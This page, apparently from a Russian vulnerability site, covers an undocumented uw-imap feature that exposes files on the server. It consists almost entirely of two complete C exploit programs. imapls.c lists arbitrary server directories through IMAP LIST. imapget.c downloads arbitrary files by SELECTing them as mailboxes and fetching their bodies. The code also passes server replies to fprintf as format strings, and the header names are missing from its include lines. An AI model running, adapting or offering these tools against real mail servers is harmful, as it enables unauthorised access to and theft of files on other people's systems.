imapls.c (позволяет просматривать содержание директории) / Уязвимости / Недокументированная возможность в uw-imap позволяет доступ к файлам на сервере / /* imapls.c (c) 2002 ZARAZA 3APA3A@security.nnov.ru /\_/\ { . . } |\ +--oQQo->{ ^ }<-----+ \ |ъДЕУШ ВЩМ U 3APA3A } +-------------o66o--+ / |/ */ #include #include #include #include #include #include #include #include int gotit=0; char buf[4100]; long size; int port; void usage( char* progname) { fprintf(stderr, "Usage: %s host list_mask\n", progname); exit(1); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s.\n", hostname); exit(-3); } return *(u_long *)hp->h_addr; } #define PGBUFSIZE 10240 int pgf; char pgbuf[PGBUFSIZE]; void pgetsinit (int fd) { pgf = fd; } char * pgets (int * len) { int i; for (i=0; i<(PGBUFSIZE-1); i++) { if(!read(pgf, pgbuf+i, 1) || pgbuf[i] == '\n')break; } *len = i+1; pgbuf[i+1]=0; return (i)?pgbuf:NULL; } int read_reply(int maxlines){ int i, n; char *s; int data = 0; for (i=0; (!maxlines || i= 2 && s[n-1] == '\n' && s[n-2] == '\r') { s[n-2] = '\n'; s[n-1] = 0; n--; } if( !data && !strncmp(s, "abc ", 3)) { fprintf(stderr, "%s", s); break; } if(*s == '*') { if (!strncmp (s, "* LIST ", 6)){ if((s=strstr(s, " \"/\" "))) { s+=5; write(1, s, strlen(s)); } else s=""; } else fprintf(stderr, s); } else if (*s == ')') data = 0; else { data = 1; write(1, s, n); } } if (!s) fprintf(stderr, "\npgets() failed\n"); if (!s || (!maxlines && strncmp(s, "abc OK", 6))) return 1; return 0; } void send_command (char * command, int show) { if(show)fprintf(stderr, ">> %s", command); write(pgf, command, strlen(command)); } int main(int argc, char* argv[]){ struct sockaddr_in sin; int sock; char buff[64]; if(argc!=3) usage(argv[0]); sin.sin_addr.s_addr = lookup(argv[1]); sin.sin_family = AF_INET; sin.sin_port = htons(143); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ fprintf(stderr, "Error: Unable to allocate socket\n"); return 1; } if( connect(sock, (struct sockaddr*)&sin,sizeof(sin)) == -1 ){ fprintf(stderr, "Unable to connect %s\n", argv[1]); return 2; } pgetsinit(sock); if (read_reply(1)) { fprintf(stderr, "\nSorry, nobody home\n"); return 3; } fprintf(stderr, " Login: ", buf); fgets(buff, 64, stdin); buff[strlen(buff)-1] = 0; snprintf(buf, 1024, "abc LOGIN %s %s\r\n", buff, getpass(" Password: ")); send_command(buf, 0); if (read_reply(0)) { fprintf(stderr, "\nSorry, wrong password\n"); return 4; } snprintf(buf, 1024, "abc LIST \"/\" \"%s\"\r\n", argv[2]); send_command(buf, 1); if (read_reply(0)) { fprintf(stderr, "\nSorry, wrong administrator\n"); return 6; } send_command("abc LOGOUT\r\n", 1); if (read_reply(0)) { fprintf(stderr, "\nHe didn't even said doodBYE\n"); return 6; } close(sock); return 0; } imapget.c (позволяет загружать файлы через imap-uw) /* imapget.c (c) 2002 ZARAZA 3APA3A@security.nnov.ru /\_/\ { . . } |\ +--oQQo->{ ^ }<-----+ \ |ъДЕУШ ВЩМ U 3APA3A } +-------------o66o--+ / |/ */ #include #include #include #include #include #include #include #include int gotit=0; char buf[4100]; long size; int port; void usage( char* progname) { fprintf(stderr, "Usage: %s host filename\n", progname); exit(1); } #define BAD -1 static const char base64val[] = { BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD, 62, BAD,BAD,BAD, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61,BAD,BAD, BAD,BAD,BAD,BAD, BAD, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25,BAD, BAD,BAD,BAD,BAD, BAD, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51,BAD, BAD,BAD,BAD,BAD }; #define DECODE64(c) (isascii(c) ? base64val[c] : BAD) int de64 (const char *in, char *out, int maxlen) { int len = 0; register unsigned char digit1, digit2, digit3, digit4; if (in[0] == '+' && in[1] == ' ') in += 2; if (*in == '\r') return(0); do { digit1 = in[0]; if (DECODE64(digit1) == BAD) return(-1); digit2 = in[1]; if (DECODE64(digit2) == BAD) return(-1); digit3 = in[2]; if (digit3 != '=' && DECODE64(digit3) == BAD) return(-1); digit4 = in[3]; if (digit4 != '=' && DECODE64(digit4) == BAD) return(-1); in += 4; *out++ = (DECODE64(digit1) << 2) | (DECODE64(digit2) >> 4); ++len; if (digit3 != '=') { *out++ = ((DECODE64(digit2) << 4) & 0xf0) | (DECODE64(digit3) >> 2); ++len; if (digit4 != '=') { *out++ = ((DECODE64(digit3) << 6) & 0xc0) | DECODE64(digit4); ++len; } } } while (*in && *in != '\r' && digit4 != '=' && (maxlen-=4) >= 4); return (len); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s.\n", hostname); exit(-3); } return *(u_long *)hp->h_addr; } #define PGBUFSIZE 10240 int pgf; char pgbuf[PGBUFSIZE]; void pgetsinit (int fd) { pgf = fd; } char * pgets (int * len) { int i; for (i=0; i<(PGBUFSIZE-1); i++) { if(!read(pgf, pgbuf+i, 1) || pgbuf[i] == '\n')break; } *len = i+1; pgbuf[i+1]=0; return (i)?pgbuf:NULL; } int b64 = 0; int read_reply(int maxlines){ int i, n; char *s; int data = 0; for (i=0; (!maxlines || i= 2 && s[n-1] == '\n' && s[n-2] == '\r') { s[n-2] = '\n'; s[n-1] = 0; n--; } fprintf(stderr, s); if( !strncmp(s, "abc ", 3)) { break; } if(*s == '*') { if (!strncmp(s, "* 1 FETCH (BODYSTRUCTURE", 24)) { if(strstr(s, "\"BASE64\"")) { fprintf(stderr, "fetching as base64\n"); b64 = 1; } else { fprintf(stderr, "fetching as text\n"); b64 = 0; } } else if (!strncmp(s, "* 1 FETCH (BODY[TEXT] {", 23)) { data = atoi(s + 23); fprintf(stderr, "fetching %d bytes of data\n", data); while(data > 0) { if(!(s = pgets(&n)))break; if(n>data)n=data; data-=n; if(b64 == 1) { n = de64(s, buf, 1024); write(1, buf, n); } else write(1, s, n); } } } } if (!s) fprintf(stderr, "\npgets() failed\n"); if (!s || (!maxlines && strncmp(s, "abc OK", 6))) return 1; return 0; } void send_command (char * command, int show) { if(show)fprintf(stderr, ">> %s", command); write(pgf, command, strlen(command)); } int main(int argc, char* argv[]){ struct sockaddr_in sin; int sock; char buff[64]; if(argc!=3) usage(argv[0]); sin.sin_addr.s_addr = lookup(argv[1]); sin.sin_family = AF_INET; sin.sin_port = htons(143); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ fprintf(stderr, "Error: Unable to allocate socket\n"); return 1; } if( connect(sock, (struct sockaddr*)&sin,sizeof(sin)) == -1 ){ fprintf(stderr, "Unable to connect %s\n", argv[1]); return 2; } pgetsinit(sock); if (read_reply(1)) { fprintf(stderr, "\nSorry, nobody home\n"); return 3; } fprintf(stderr, " Login: ", buf); fgets(buff, 64, stdin); buff[strlen(buff)-1] = 0; snprintf(buf, 1024, "abc LOGIN %s %s\r\n", buff, getpass(" Password: ")); send_command(buf, 0); if (read_reply(0)) { fprintf(stderr, "\nSorry, wrong password\n"); return 4; } snprintf(buf, 4000, "abc SELECT %s\r\n", argv[2]); send_command(buf, 1); if (read_reply(0)) { fprintf(stderr, "\nSorry, wrong pocket\n"); return 5; } send_command("abc FETCH 1:1 (BODYSTRUCTURE)\r\n", 1); if (read_reply(0)) { fprintf(stderr, "\nSorry, wrong administrator\n"); return 6; } send_command("abc FETCH 1:1 (BODY[TEXT])\r\n", 1); if (read_reply(0)) { fprintf(stderr, "\nSorry, wrong administrator\n"); return 6; } send_command("abc LOGOUT\r\n", 1); if (read_reply(0)) { fprintf(stderr, "\nHe didn't even said doodBYE\n"); return 6; } close(sock); return 0; }